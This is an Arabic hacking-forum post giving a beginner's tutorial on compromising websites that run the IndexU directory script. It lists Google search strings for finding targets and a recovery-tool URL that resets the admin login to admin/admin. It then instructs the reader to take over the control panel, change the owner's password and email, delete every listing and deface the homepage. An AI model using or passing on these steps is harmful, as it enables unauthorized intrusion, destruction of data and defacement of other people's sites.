الهكرز- العقرب المميت

السلام عليكم ورحمة الله وبركاته

اهلا بكم اخواني

اليوم عندنا ثغرة جميلة جدا وسهلة والي يلاقي الشرح ناقص او فيه اغلاط يصححلي من بعد اذنكم لكني اضمن لكم انها كاملة باذن الله.

الثغرة هي معروفة من زمان وهي ثغرة دليل المواقع

معلش الي مبتدئ الله يعينه لاني راح اشرحها بسرعة يلا سموا الله

اولا :(( أقسم بالله الواحد القهار اني لن أخترق اي موقع كان للمسلمين الا في منفعة الدين ))

بسم الله الرحمن الرحيم
اولا روح على www.google.com

ابحث عن وحدة من هذي الكلمات اذا مانفعت جرب الثانية وهكذا:

indexu

indexu/index.php

links/index.php

link/index.php

والآن اختار موقع وافتحه وان شاء الله يكون فيه الثغرة ونفترض انك اخترت موقع طبعا راح يطلع لك هيك

http://www.xxx.com/indexu/index.php

الحين استبدل ال index.php بهذي الوصلة

recovery_tools/create_admin_user.php

بصير الموقع هيك

http://www.xxx.com/indexu/rec..._admin_use

طيب الحين بطلع الك هيك

Delete old administrator user ....ok
Create administrator user ....ok

اذا طلع هيك قول الحمد لله حمدا كثيرا يعني الموقع فيه الثغرة اما اذا ماطلع جرب موقع ثاني يعني((الله يعينك))

طيب الحين تغير الباسوورد واسم المستخدم وصاروا

اسم المستخدم = admin

الباسوورد = admin

ممتاز

طيب بعدين كيف ندخل؟؟

الحين تروح هذي الموصلة

http://www.xxx.com/indexu/admin/index.php

وحط اسم المستخدم والباسوورد الي حكيناه

طيب الحين مبروك انت داخل لوحة التحكم للموقع بس ايش بدك اتسوي؟؟

روح اولا على Change Password

وانت اكيد تعرف كيف تغير الباسوورد

وطيب الحين بعد ماغيرنا الباسوورد روح على Change Email Address

طبعا معروفة علشان تغير ايميل مشرف الموقع وتحط ايميلك

طيب بعدين تروح على View/Edit/Delete

وامسح كل حاجة قدامك او الي راح ربي يقدروا الك

بعدين روح على Template Modifier

علشان تلعب اشوي بواجهة الموقع

الحين اضغط على Theme Name

بتحط الثيم الرئيسي الي هو default

واختار الملف index.php من امام خانة File Name

ثم اضغط Edit File

ويلا العب بالواجهة مثل مابدك وفي طبعا طريقة حلوة للعب بالواجهة مثل انك تنسخ كل الموجود في ملف الindex.php وتحطه بالفرونت بيج بعدين عدل الي تحبه بعدين احفظه.

وبكذا انتهيت من هذا الشرح

واي سؤال اسألوا؟؟؟

وهذا والله أعلم